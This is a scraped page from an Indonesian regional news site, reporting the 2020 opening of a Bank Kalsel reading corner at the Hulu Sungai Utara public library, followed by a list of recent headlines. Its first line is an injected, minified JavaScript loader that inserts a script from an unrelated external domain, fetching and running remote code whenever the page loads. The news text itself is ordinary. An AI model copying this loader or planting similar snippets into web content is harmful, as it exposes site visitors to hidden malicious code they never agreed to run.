(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Ada Pojok Literasi Baru di Perpustakaan HSU


KANALKALIMANTAN.COM, AMUNTAI – Membangun budaya membaca di Kabupaten Hulu Sungai Utara (HSU), Dinas Perpustakaan dan Kerasipan HSU menggandeng Bank Kalsel Cabang Amuntai menyediakan pojok baca.

Ruang baca itu dinamakan Bank Kalsel Corner, berada di perpustakaan umum HSU yang penggunaannya diresmikan, Senin (13/7/2020). Bank Kalsel Corner adalah merupakan sebuah ruang baca atau fasilitas yang sengaja disediakan untuk edukasi peran dan fungsi bank pemerintah daerah Kalimantan Selatan yang dapat diakses melalui koleksi cetak maupun elektronik.

Selain itu Bank Kalsel Corner juga merupakan bagian dari program sosialisasi bank Pemerintah daerah yang diharapkan dapat meningkatkan minat baca masyarakat di HSU.

“Kenapa kami mendukung kegiatan bank kalsel corner karena buku itu adalah salah satu alat untuk mencerdaskan kehidupan bangsa, dengan kita banyak membaca, buku-buku yang kami berikan atau sumbangkan itu mudah-mudahan  bermanfaat bagi masyarakat,” kata Fachreza Nor Asli, Kepala Bank Kalsel Cabang Amuntai saat peresmian Bank Kalsel Corner.

 

Dikatakan Fachreza, Bank Kalsel selalu siap bersinergi  dengan program – program yang ada di Kabupaten HSU, karena Bank Kalsel adalah bank milik pemerintah daerah.

“Mudah-mudahan kegiatan kita ini bermanfaat dan mudah – mudahan Bank Kalsel Corner bisa di ikuti oleh kabupaten/kota lainnya di provinsi Kalsel,” imbuhnya.

Pojok Literasi Bank Kalsel, berada di perpustakaan umum HSU yang penggunaannya diresmikan, Senin (13/7/2020). foto: dew

Sementara itu, Kepala Dispersip HSU Hj Lailatanur Raudah mengakui pentingnya kerjasama dan kolaborasi semua stakeholder SKPD, Forkopimda, BUMD, dan BUMN dalam pengembangan perpustakaan dan kebudayaan, termasuk untuk meningkatkan kegemaran membaca.

Karena perpustakan sekarang sudah bertranformasi menjadi sahabat masyarakat dalam menciptakan SDM yang unggul melalui kegiatan tranformasi perpustakaan berbasis inklusasi sosial.

“Adanya Bank Kalsel Corner di perpustakaan umum daerah  Kabupaten HSU diharapkan berdampak nyata  pada peningkatan budaya minat baca,” pungkasnya.

Saat peresmian juga dilakukan penandatanganan MoU dari kedua belah pihak, penyerahan bantuan untuk kegiatan pemilihan duta Genre dan jambore PIK Remaja Kabupaten HSU tahun 2020 senilai Rp 8.860.000. Dan penyerahan bantuan sarana prasarana  library  corner dari Bank Kalsel senilai Rp 25.822.000. (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie

Al Ghifari

Recent Posts

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

2 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

2 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

2 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

2 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

2 jam ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

4 jam ago

This website uses cookies.